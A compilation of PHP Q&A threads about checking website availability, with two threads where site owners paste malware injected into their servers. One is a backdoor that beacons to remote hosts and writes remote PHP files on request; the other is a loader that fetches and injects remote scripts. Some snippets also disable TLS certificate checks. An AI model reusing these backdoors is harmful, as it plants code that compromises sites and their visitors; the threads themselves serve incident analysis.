How to check if a website is accessible? - PHP

I want to see if a website can be accessed or not with a PHP page.
Here is my plan:
<?php
$website = true; /* placeholder: real availability check goes here */
if ($website) {
    echo '<iframe src="http://64.126.89.241/" width="100%" height="100%"></iframe>';
} else {
    echo '<iframe src="http://tsiserver.us/backup/" width="100%" height="100%"></iframe>';
}
?>
The page will be hosted on another server, so if my connection goes down, users can still reach the backup version of the site.

Here is a simple function that determines whether a website is reachable, using PHP and cURL:
function urlExists($url = NULL)
{
    if ($url == NULL) return false;

    $ch = curl_init($url);
    curl_setopt($ch, CURLOPT_TIMEOUT, 5);
    curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    $data = curl_exec($ch);
    $httpcode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    curl_close($ch);

    // Treat any 2xx response as "exists"
    return ($httpcode >= 200 && $httpcode < 300);
}
This was adapted from a post on how to check whether a URL exists. Because Twitter should return an error status above 300 when it is in maintenance, or a 404, this should work well.
reference : https://stackoverflow.com/a/1239090/568414

Based on your approach, you would need 3 different servers:
The server that hosts the script
The server that hosts the website
The server that hosts the fallback website
This is not very efficient, and many hosting services automatically provide a fallback or cached version of your site when it is down. You don't have to maintain a script for this, but if you insist, you can refer to PHP's cURL manual.

The answer is here, thanks guys!
<?php
function ping($host, $port, $timeout) {
    $tB = microtime(true);
    $fP = fsockopen($host, $port, $errno, $errstr, $timeout);
    if (!$fP) {
        return "down";
    }
    $tA = microtime(true);
    fclose($fP);
    return round((($tA - $tB) * 1000), 0) . " ms";
}

$website = ping("64.126.89.241", 80, 10);
if ($website != "down") {
    echo '<iframe src="http://64.126.89.241/" width="100%" height="100%"></iframe>';
} else {
    echo '<iframe src="http://tsiserver.us/backup/" width="100%" height="100%"></iframe>';
}
?>

Related

My server was hacked. Somebody uploaded scripts, and I have no idea what they have done to my server

Someone uploaded this script to our server:
https://github.com/mIcHyAmRaNe/wso-webshell
And we have found inc.php files in different directories on our server. The inc file contains this code:
<?php
error_reporting(0);
$s='http://a1b2cd.club/';
$host = str_replace('www.', '', #$_SERVER['HTTP_HOST']);
$x = $s.'l-'.base64_encode($host);
if(function_exists('curl_init'))
{
$ch = #curl_init(); curl_setopt($ch, CURLOPT_URL, $x); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $gitt = curl_exec($ch); curl_close($ch);
if($gitt == false){
#$gitt = file_get_contents($x);
}
}elseif(function_exists('file_get_contents')){
#$gitt = file_get_contents($x);
}
echo $gitt;
if(isset($_GET['ksfg'])){
$f=fopen($_GET['ksfg'].'.php','a');
fwrite($f,file_get_contents($s.'s-'.$_GET['ksfg']));
fclose($f);
}
echo '<!DOCTYPE html!>';
?><?php
function GetIP(){
if(getenv("HTTP_CLIENT_IP")) {
$ip = getenv("HTTP_CLIENT_IP");
} elseif(getenv("HTTP_X_FORWARDED_FOR")) {
$ip = getenv("HTTP_X_FORWARDED_FOR");
if (strstr($ip, ',')) {
$tmp = explode (',', $ip);
$ip = trim($tmp[0]);
}
} else {
$ip = getenv("REMOTE_ADDR");
}
return $ip;
}
$x = base64_decode('aHR0cDovL2J5cjAwdC5jby9sLQ==').GetIP().'-'.base64_encode('http://'.$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']);
if(function_exists('curl_init'))
{
$ch = #curl_init(); curl_setopt($ch, CURLOPT_URL, $x); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $gitt = curl_exec($ch); curl_close($ch);
if($gitt == false){
#$gitt = file_get_contents($x);
}
}elseif(function_exists('file_get_contents')){
#$gitt = file_get_contents($x);
}
?>
</marquee><script src=http://expoilt.com/ccb.js></script>
We have no idea what this script has done to our server. Should we create a new instance, or should we suspend the cPanel account from WHM, create a new one, and copy every file over? Please help me understand what this code actually does.
If you get hacked, first change all your passwords and re-check the code you wrote yourself, comparing it against the original version from before the third party got into your site (consider taking the site offline while you check). There is likely a defect that allowed the third party to upload whatever they wanted to your site, and that has to be fixed.
As for the added code: it essentially reports your site's contents and IP addresses to a remote server, and performs some redirects, which is very dangerous for regular users. What the third party will do next is anyone's guess; once they gain admin privileges from outside, they can effectively act as the site's owner.
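As a first practical step, it can help to search the whole docroot for other files carrying the same markers as this injection. A minimal sketch, with assumed function name, patterns, and directory (none of them are from the original posts):

```php
<?php
// Hypothetical helper: recursively scan a directory for PHP files that
// contain patterns seen in this family of injected code. Adjust the
// pattern list for your own site before trusting the results.
function find_suspicious_files($dir, $patterns = array('base64_decode', 'ksfg', 'a1b2cd.club')) {
    $hits = array();
    $it = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($dir, FilesystemIterator::SKIP_DOTS)
    );
    foreach ($it as $file) {
        if (strtolower($file->getExtension()) !== 'php') continue;
        $code = file_get_contents($file->getPathname());
        foreach ($patterns as $p) {
            if (strpos($code, $p) !== false) {
                $hits[] = $file->getPathname();
                break; // one match is enough to flag the file
            }
        }
    }
    return $hits;
}
```

Anything it flags should then be inspected by hand; attackers often drop several differently named copies of the same backdoor.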

How to use "fallback" method for PHP curl (HTTPS)?

Situation: I'm improving some code in a PHP-based monitoring web app that checks the health of other web apps/services.
Goal: we are using cURL as the primary method to fetch headers and confirm, via HTTP return codes, that the monitored app is accessible. This works great as of now. However, we are trying to build in a "fallback" method: IF the cURL HTTP response code from the monitored app is outside our defined values (e.g. HTTP code 404), PHP would then use a PING-like function to check whether there is any response at that same address (for example, the webserver is still "running" and occupying the given port, but not serving proper headers).
Problem: our fallback method (stream_socket_client) DOES work for non-secure sites, as we can simply define "hostname:port", which BOTH cURL and stream_socket_client can use. However, if we want to monitor a secure site (HTTPS), cURL requires the https protocol to be defined before the host, which makes our fallback method (stream_socket_client) fail, as it only accepts the host:port format.
So, for example:
$URL: https://example.com:443 (this would return a "GOOD" cURL response, but a "DOWN" stream_socket_client response)
$URL: example.com:443 (this would return an "UP" stream_socket_client response, but a "DOWN" cURL response)
So, if we used https://example.com:443 as our URL and the webserver became unresponsive while still running on that port, both checks would fail because https is defined.
This is a simplified version of our current code:
<?php
$url = "example.com:80";

function curl($url) {
    $handle = curl_init($url);
    curl_setopt($handle, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($handle, CURLOPT_HEADER, true);
    curl_setopt($handle, CURLOPT_NOBODY, true);
    curl_setopt($handle, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($handle, CURLOPT_SSL_VERIFYHOST, 0);
    curl_setopt($handle, CURLOPT_URL, $url);
    $response = curl_exec($handle);
    $httpCode = curl_getinfo($handle, CURLINFO_HTTP_CODE);

    if (($httpCode >= 200 && $httpCode < 400) || $httpCode == 401 || $httpCode == 405) {
        echo "CURL GOOD, $httpCode";
        echo "STATUS: GREEN";
    } else {
        $fp = stream_socket_client($url, $errno, $errstr);
        if (!$fp) {
            echo "CURL BAD, PING DOWN";
            echo "STATUS: RED";
        } else {
            echo "CURL BAD, PING UP";
            echo "STATUS: YELLOW";
        }
    }
    curl_close($handle);
}
?>
Any ideas how to use a fallback method to check if a port is open or not? I don't have to stick with PHP, can use some JS, but would prefer PHP.
EDIT 1:
Thanks to @drew010 I know I ultimately need to use fsockopen. However, I'll need to use parse_url(), which can then pass a "sterile" URL to fsockopen for the fallback "ping" check.
However, I'm not sure how to strip ONLY the protocol and leave the port and sub-path (if defined). I'm also not sure how to pass the sterile URL to the fsockopen function to use for the check. So far I have the code below, but I know I'm missing something.
The code below parses http://example.com down to example.com.
function parseurl($url) {
    $url = 'http://example.com:80';
    $host = parse_url($url, PHP_URL_HOST);
    // This works for stripping the protocol and "www.",
    // but needs to leave the port and sub-path if defined.
    if (!$host)
        $host = $url;
    if (substr($host, 0, 4) == "www.")
        $host = substr($host, 4);
    if (strlen($host) > 50)
        $host = substr($host, 0, 47) . '...';
    return $host;
}
// How to pass the sanitized URL to the ping function??
function ping($host, $port, $timeout = 1) {
    $fp = fsockopen($host, $port, $errno, $errstr, $timeout);
    if (!$fp) {
        echo "CLOSED";
        return false;
    }
    fclose($fp);
    echo "OPEN";
    return true;
}
Found the answer:
This script uses cURL to check whether a given HOST is serving a webpage.
If NOT, a PING function checks whether anything is listening on the given port.
<?php
/*
 * This script uses cURL to check if a given HOST is serving a webpage.
 * If NOT, use a PING function to check if anything is listening on the given port.
 * URL MUST contain a PORT after the HOST.
 * URL CAN include any protocol or sub-path.
 */

// Sanitize the URL down to host:port/path ONLY (if PORT or PATH don't exist, they are ignored):
function url_to_domain($url) {
    echo "Input URL ..... $url<br />\n";
    $host = parse_url($url, PHP_URL_HOST);
    $port = parse_url($url, PHP_URL_PORT);
    $path = parse_url($url, PHP_URL_PATH);
    // If the URL can't be parsed, report it
    // (change to "return false" if you don't want that)
    if (!$host)
        echo "fail";
    // Remove "www." :
    if (substr($host, 0, 4) == "www.")
        $host = substr($host, 4);
    if (strlen($host) > 50)
        $host = substr($host, 0, 47) . '...';
    // Construct the sanitized URL, adding ":port/path" to HOST:
    return $host . ":" . $port . $path;
}

// Ping the "sanitized" URL:
$url = url_to_domain('http://google.com:80');
// pfsockopen() wants host and port separately, so split them back out:
list($host, $port) = explode(':', $url, 2);
$port = (int) $port;
$fp = pfsockopen($host, $port, $errno, $errstr, $timeout = 5);
if (!$fp) {
    echo "Ping URL ...... $url <br />\n ";
    echo "URL status ..... CLOSED <br />\n";
    echo "Error ............... $errstr ($errno)<br />\n";
}
else {
    // $out = "GET / HTTP/1.1\r\n";
    // $out .= "Host: $host\r\n";
    // $out .= "Connection: Close\r\n\r\n";
    // fwrite($fp, $out);
    // Display the response header:
    /*
    while (!feof($fp)) {
        echo fgets($fp, 128);
    }
    */
    // fclose($fp);
    echo "Ping URL ...... $url <br />\n ";
    echo "URL status .... OPEN";
}
?>

PHP: cURL connection to URL refused when sending a GET request on some servers

I made a function to read GeoPlugin data for my websites, and on one server I found a weird issue: all cURL requests are refused. Here is part of my code:
protected $url='http://www.geoplugin.net/json.gp?ip={IP}&base_currency={CURRENCY}';
protected function __get_data($ip=false, $currency='')
{
// Current or custom IP
$ip = ((is_bool($ip) && $ip==false) ? $this->__ip() : $ip);
if($ip != '127.0.0.1' && $ip != '0.0.0.0') // note: with || this condition was always true
{
// Configure GET function
$url = str_replace('{IP}', $ip, $this->url );
if(empty($currency))
$url = str_replace( '&base_currency={CURRENCY}', '', $url);
else
$url = str_replace( '{CURRENCY}', $currency, $url);
// Get content from URL
if(function_exists("curl_init"))
{
$cURL = curl_init();
curl_setopt($cURL, CURLOPT_URL, $url);
curl_setopt($cURL, CURLOPT_CONNECTTIMEOUT ,5);
curl_setopt($cURL, CURLOPT_TIMEOUT , 2);
curl_setopt($cURL, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($cURL, CURLOPT_RETURNTRANSFER, true);
curl_setopt($cURL, CURLOPT_HTTPHEADER, array('Accept: application/json'));
$result = curl_exec($cURL);
curl_close($cURL);
}
else
{
$result = file_get_contents($url);
}
// Return objects from JSON data
if($result!=false)
{
return json_decode($result);
}
else return false;
}
else return false;
}
## find the real IP address of the visitor ##
protected function __ip()
{
$findIP=array(
'HTTP_CLIENT_IP',
'HTTP_X_FORWARDED_FOR',
'HTTP_X_FORWARDED',
'HTTP_X_CLUSTER_CLIENT_IP',
'HTTP_FORWARDED_FOR',
'HTTP_FORWARDED',
'REMOTE_ADDR'
);
$ip = '';
foreach($findIP as $http)
{
if(function_exists("getenv"))
{
$ip = getenv($http);
}
else
{
if (array_key_exists($http, $_SERVER) !== false){
foreach (explode(',', $_SERVER[$http]) as $findIP){
$ip = trim($findIP);
}
}
}
if(function_exists("filter_var") && !empty($ip))
{
if (filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) !== false) return $ip;
}
else if(preg_match('/^(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)$/', $ip) && !empty($ip))
{
return $ip;
}
}
return '0.0.0.0';
}
On around 90 websites everything works perfectly; on this one website, var_dump() shows that the connection is refused. I also tried file_get_contents with the same result, and a bare cURL call in a test PHP file separate from the website, again with the same result. What could the problem be?
It may be a DNS problem;
It may be a poor connection (more time needed for loading);
Your queries may be blocked by the target server, because too many requests came from your IP (the source server's IP) in a short time, exceeding its limits.
What you can do:
Make sure that you can open the target URL from the source server without using cURL (on simple shared hosting, as opposed to a VPS, you won't be able to check this);
Increase the values of CURLOPT_CONNECTTIMEOUT and CURLOPT_TIMEOUT;
If the problem is still not solved, use a proxy with cURL (see the official documentation for CURLOPT_PROXY and the other proxy options of curl_setopt).
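To illustrate the last suggestion, here is a minimal sketch of pointing cURL at a proxy. The helper name and the proxy address are placeholders, not part of the original answer:

```php
<?php
// Hypothetical helper: build a cURL handle that routes the request
// through an HTTP proxy. Replace 127.0.0.1:8080 with a real proxy.
function build_proxied_handle($url, $proxy = '127.0.0.1:8080') {
    $ch = curl_init($url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);
    curl_setopt($ch, CURLOPT_TIMEOUT, 15);
    curl_setopt($ch, CURLOPT_PROXY, $proxy);             // proxy address
    curl_setopt($ch, CURLOPT_PROXYTYPE, CURLPROXY_HTTP); // plain HTTP proxy
    return $ch;
}
```

Calling curl_exec() on the returned handle would then go through the proxy instead of connecting to geoplugin.net directly, which sidesteps a ban on the source server's IP.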
cURL might be disabled on your server.
Run phpinfo() to check the status of cURL.
If it is disabled, please install the cURL extension and enable it in PHP.

Malicious PHP code injected into a PHP file

Last week we had a problem on our server where code was injected into PHP files. I was wondering what the cause of this could have been. The code snippet that has been injected into our files looked something like this.
#be7339#
if (empty($qjqb))
{
error_reporting(0);
#ini_set('display_errors', 0);
if (!function_exists('__url_get_contents'))
{
function __url_get_contents($remote_url, $timeout)
{
if(function_exists('curl_exec'))
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $remote_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
curl_setopt($ch, CURLOPT_TIMEOUT, $timeout); //timeout in seconds
$_url_get_contents_data = curl_exec($ch);
curl_close($ch);
}
elseif (function_exists('file_get_contents') && ini_get('allow_url_fopen'))
{
$ctx = #stream_context_create(array('http' =>array('timeout' => $timeout,)));
$_url_get_contents_data = #file_get_contents($remote_url, false, $ctx);
} elseif (function_exists('fopen') && function_exists('stream_get_contents')) {
$handle = #fopen($remote_url, "r");
$_url_get_contents_data = #stream_get_contents($handle);
} else {
$_url_get_contents_data = __file_get_url_contents($remote_url);
}
return $_url_get_contents_data;
}
}
if (!function_exists('__file_get_url_contents'))
{
function __file_get_url_contents($remote_url)
{
if (preg_match('/^([a-z]+):\/\/([a-z0-9-.]+)(\/.*$)/i', $remote_url, $matches))
{
$protocol = strtolower($matches[1]);
$host = $matches[2];
$path = $matches[3];
} else {
// Bad remote_url-format
return FALSE;
}
if ($protocol == "http")
{
$socket = #fsockopen($host, 80, $errno, $errstr, $timeout);
} else
{
// Bad protocol
return FALSE;
}
if (!$socket)
{
// Error creating socket
return FALSE;
}
$request = "GET $path HTTP/1.0\r\nHost: $host\r\n\r\n";
$len_written = #fwrite($socket, $request);
if ($len_written === FALSE || $len_written != strlen($request))
{
// Error sending request
return FALSE;
}
$response = "";
while (!#feof($socket) &&
($buf = #fread($socket, 4096)) !== FALSE) {
$response .= $buf;
}
if ($buf === FALSE) {
// Error reading response
return FALSE;
}
$end_of_header = strpos($response, "\r\n\r\n");
return substr($response, $end_of_header + 4);
}
}
if (empty($__var_to_echo) && empty($remote_domain))
{
$_ip = $_SERVER['REMOTE_ADDR'];
$qjqb = "http://pleasedestroythis.net/L3xmqGtN.php";
$qjqb = __url_get_contents($qjqb."?a=$_ip", 1);
if (strpos($qjqb, 'http://') === 0)
{
$__var_to_echo = '<script type="text/javascript" src="' . $qjqb . '?id=13028308"></script>';
echo $__var_to_echo;
}
}
}
I would like to ask how this could have happened. And how to prevent this in the future.
Thanks in advance.
Script (PHP) code injection usually means that someone has gotten hold of the password(s) to your hosting account. At the very minimum scan your PCs for spyware and viruses, and then change your passwords. Use SSL when connecting to your hosting account control panel, if possible. Be careful about using FTP, as it sends passwords in the clear. See if your host supports a more secure file transfer method.
The most common way this happens is through a script that allows file uploads. If that script does not validate what is uploaded, a malicious user can upload a PHP file.
If your upload folder allows parsing of PHP files, the user can then run that PHP file in the browser. It could be some sort of file explorer, which would show the user all the files on your server. If any files have loose permissions, the user could easily edit them to include the extra code you are seeing.
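To make the validation point concrete, a minimal whitelist check might look like this (the function name and the allowed extensions are illustrative assumptions):

```php
<?php
// Hypothetical sketch of whitelisting uploads: only allow a fixed set
// of extensions and reject anything that could run as PHP.
function is_allowed_upload($filename, $allowed = array('jpg', 'jpeg', 'png', 'gif', 'pdf')) {
    // Reject any name containing ".php" anywhere, so "shell.php.jpg"-style
    // double extensions are caught too.
    if (stripos($filename, '.php') !== false) return false;
    // Check the extension after the last dot against the whitelist.
    $ext = strtolower(pathinfo($filename, PATHINFO_EXTENSION));
    return in_array($ext, $allowed, true);
}
```

A real implementation should also verify the MIME type server-side and store uploads outside the docroot, or in a folder where PHP execution is disabled.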
Usually it's because somebody else got access to your FTP, or you allow uploading PHP files.
You should look at other files too, because there could be more code that keeps adding those lines back (just a guess, based on the "#be7339#" marker at the beginning).
What Apache version is your server running? This problem can come from using an outdated version.
Look at this link about security vulnerabilities in old versions of Apache:
http://httpd.apache.org/security/vulnerabilities_20.html

PHP Curl check for file existence before downloading

I am writing a PHP program that downloads a PDF from a backend and saves it to a local drive. How do I check whether the file exists before downloading?
Currently I am using cURL (see code below) to check and download, but it still downloads the file, which is 1 KB in size.
$url = "http://wedsite/test.pdf";
$path = "C:\\test.pdf";
downloadAndSave($url, $path);

function downloadAndSave($urlS, $pathS)
{
    $fp = fopen($pathS, 'w');
    $ch = curl_init($urlS);
    curl_setopt($ch, CURLOPT_FILE, $fp);
    $data = curl_exec($ch);
    $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    echo $httpCode;
    // If 404 is returned, then the file was not found.
    // (Note: the original strcmp($httpCode, "404") == 1 never detected this,
    // since strcmp returns 0 on a match.)
    if ($httpCode == 404)
    {
        echo $httpCode;
        echo $urlS;
    }
    fclose($fp);
}
I want to check whether the file exists before even downloading. Any idea how to do it?
You can do this with a separate cURL HEAD request:
curl_setopt($ch, CURLOPT_NOBODY, true);
$data = curl_exec($ch);
$httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
When you actually want to download, you can set NOBODY back to false.
Call this before your download function and you're done:
<?php
function remoteFileExists($url) {
    $curl = curl_init($url);
    // Don't fetch the actual page; we only want to check that the connection is OK
    curl_setopt($curl, CURLOPT_NOBODY, true);
    // Do the request
    $result = curl_exec($curl);
    $ret = false;
    // If the request did not fail
    if ($result !== false) {
        // If the request was OK, check the response code
        $statusCode = curl_getinfo($curl, CURLINFO_HTTP_CODE);
        if ($statusCode == 200) {
            $ret = true;
        }
    }
    curl_close($curl);
    return $ret;
}
?>
Since you are using HTTP to fetch a resource on the internet, what you really want to check is whether the return code is a 404.
On some PHP installations, you can just use file_exists($url) out of the box. This does not work in all environments, however. http://www.php.net/manual/en/wrappers.http.php
Here is a function much like file_exists but for URLs (note that, despite the name, it uses get_headers rather than cURL):
<?php
function curl_exists($url)
{
    $file_headers = @get_headers($url);
    if ($file_headers[0] == 'HTTP/1.1 404 Not Found') {
        $exists = false;
    }
    else {
        $exists = true;
    }
    return $exists;
}
?>
source: http://www.php.net/manual/en/function.file-exists.php#75064
Sometimes the CURL extension isn't installed with PHP. In that case you can still use the socket library in the PHP core:
<?php
function url_exists($url) {
    $a_url = parse_url($url);
    if (!isset($a_url['port'])) $a_url['port'] = 80;
    $errno = 0;
    $errstr = '';
    $timeout = 30;
    // gethostbyname() returns its input unchanged when the host doesn't resolve
    if (isset($a_url['host']) && $a_url['host'] != gethostbyname($a_url['host'])) {
        $fid = fsockopen($a_url['host'], $a_url['port'], $errno, $errstr, $timeout);
        if (!$fid) return false;
        $page  = isset($a_url['path'])  ? $a_url['path'] : '';
        $page .= isset($a_url['query']) ? '?' . $a_url['query'] : '';
        fputs($fid, 'HEAD ' . $page . ' HTTP/1.0' . "\r\n" . 'Host: ' . $a_url['host'] . "\r\n\r\n");
        $head = fread($fid, 4096);
        $head = substr($head, 0, strpos($head, 'Connection: close'));
        fclose($fid);
        // Note: "[200|302]" is a character class (digits 0, 2, 3 and '|'),
        // not alternation; "(200|302)" was probably intended.
        if (preg_match('#^HTTP/.*\s+[200|302]+\s#i', $head)) {
            $pos = strpos($head, 'Content-Type');
            return $pos !== false;
        }
        return false;
    } else {
        return false;
    }
}
?>
source: http://www.php.net/manual/en/function.file-exists.php#73175
An even faster function can be found here:
http://www.php.net/manual/en/function.file-exists.php#76246
In the first example above, $file_headers[0] may contain more than, or something other than, 'HTTP/1.1 404 Not Found', e.g.:
HTTP/1.1 404 Document+%2Fdb%2Fscotbiz%2Freports%2FR20131212%2Exml+not+found
So it's important to use some other test, e.g. a regex, as '==' is not reliable.
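For example, instead of comparing the whole status line with '==', the numeric code can be extracted with a regex (a small sketch; the helper name is an assumption):

```php
<?php
// Hypothetical helper: pull the numeric status code out of a raw HTTP
// status line, so variations in the reason phrase don't matter.
function status_code_from_line($line) {
    if (preg_match('#^HTTP/\S+\s+(\d{3})#', $line, $m)) {
        return (int) $m[1];
    }
    return 0; // unparseable line
}
```

With this, both 'HTTP/1.1 404 Not Found' and the mangled variant above yield 404, so the existence check becomes status_code_from_line($file_headers[0]) != 404.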
